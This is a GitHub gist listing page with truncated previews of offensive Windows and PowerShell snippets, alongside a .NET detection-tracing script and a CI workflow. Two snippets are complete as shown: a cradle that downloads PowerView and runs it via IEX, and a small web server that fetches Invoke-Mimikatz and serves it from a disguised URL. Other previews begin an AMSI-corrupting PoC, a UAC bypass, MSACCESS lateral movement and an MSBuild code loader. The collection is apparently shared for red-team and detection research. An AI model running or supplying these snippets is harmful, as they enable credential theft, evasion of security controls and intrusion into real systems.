cobbr
/ CollectDotNetEvents.ps1
Last active
January 24, 2019 01:35
— forked from mattifestation/CollectDotNetEvents.ps1
A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Start-DotNetEventCollection | |
| { | |
| Param( | |
| [Parameter(Position = 0)] | |
| [Alias('PSPath')] | |
| [String] $TracePath = './dotNetTrace.etl', | |
| [Parameter(Position = 1)] | |
| [String] $TraceName = 'dotNetTrace' | |
| ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Add-Type -AssemblyName System.Security | |
| $Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1') | |
| $Bytes = ([Text.Encoding]::ASCII).GetBytes($Content) | |
| $EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine) | |
| IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine))) |
cobbr
/ server.ps1
Last active
January 30, 2020 18:55
— forked from obscuresec/dirtywebserver.ps1
Dirty PowerShell Webserver
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1") | |
| $Hso = New-Object Net.HttpListener | |
| $Hso.Prefixes.Add("http://+:8080/") | |
| $Hso.Start() | |
| While ($Hso.IsListening) { | |
| $HC = $Hso.GetContext() | |
| $HRes = $HC.Response | |
| $HRes.Headers.Add("Content-Type","text/plain") | |
| If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') { | |
| $Buf = [Text.Encoding]::UTF8.GetBytes($mk) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" ); | |
| actCtx.Manifest = "C:\\Tools\\COM\\dynwrap.test.manifest"; | |
| try | |
| { | |
| var DX = actCtx.CreateObject("DynamicWrapperX"); | |
| DX.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l"); // Register a dll function. | |
| res = DX.MessageBoxW(0, "Hello, world!", "Test", 4); // Call the function. | |
| } | |
| catch(e){ WScript.Echo("Fail");} |
OsirisTerje
/ NetFrameWork.Legacy.CI.yml
Created
November 14, 2019 19:08
Actions yml starter workflow for a .NetFramework build using the legacy project format
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| name: NetFrameWork.Legacy.CI | |
| on: [push] | |
| jobs: | |
| build: | |
| runs-on: windows-latest | |
| steps: | |
| - uses: actions/checkout@v1 |
Philts
/ Invoke-AccessXSLT.ps1
Last active
February 14, 2021 15:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Lateral Movement Via MSACCESS TransformXML | |
| Author: Philip Tsukerman (@PhilipTsukerman) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| #> | |
| function Invoke-AccessXSLT { | |
| <# |
chryzsh
/ powershell-uac-always-notify-bypass.ps1
Created
April 28, 2019 22:06
uac bypass for always notify (works on 1903)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $assemblies=( | |
| "System" | |
| ) | |
| $source=@" | |
| using System; | |
| using Microsoft.Win32; | |
| using System.Diagnostics; | |
| namespace Helloworld |
mattifestation
/ CorruptCLRGlobal.ps1
Created
December 7, 2018 12:45
A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Subvert-CLRAntiMalware { | |
| <# | |
| .SYNOPSIS | |
| A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694. | |
| .DESCRIPTION | |
| clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open. |
bohops
/ JankyAF.csproj
Last active
April 28, 2022 21:44
Fun loader for Casey Smith's (@subTee) JanyAF.xsl
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > |
mattifestation
/ CollectDotNetEvents.ps1
Created
August 27, 2018 21:50
A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets | |
| # Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass | |
| # logman stop dotNetTrace -ets | |
| # This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe | |
| # I got the process ID by running a procmon trace | |
| $TargetProcessId = 8256 |
OlderNewer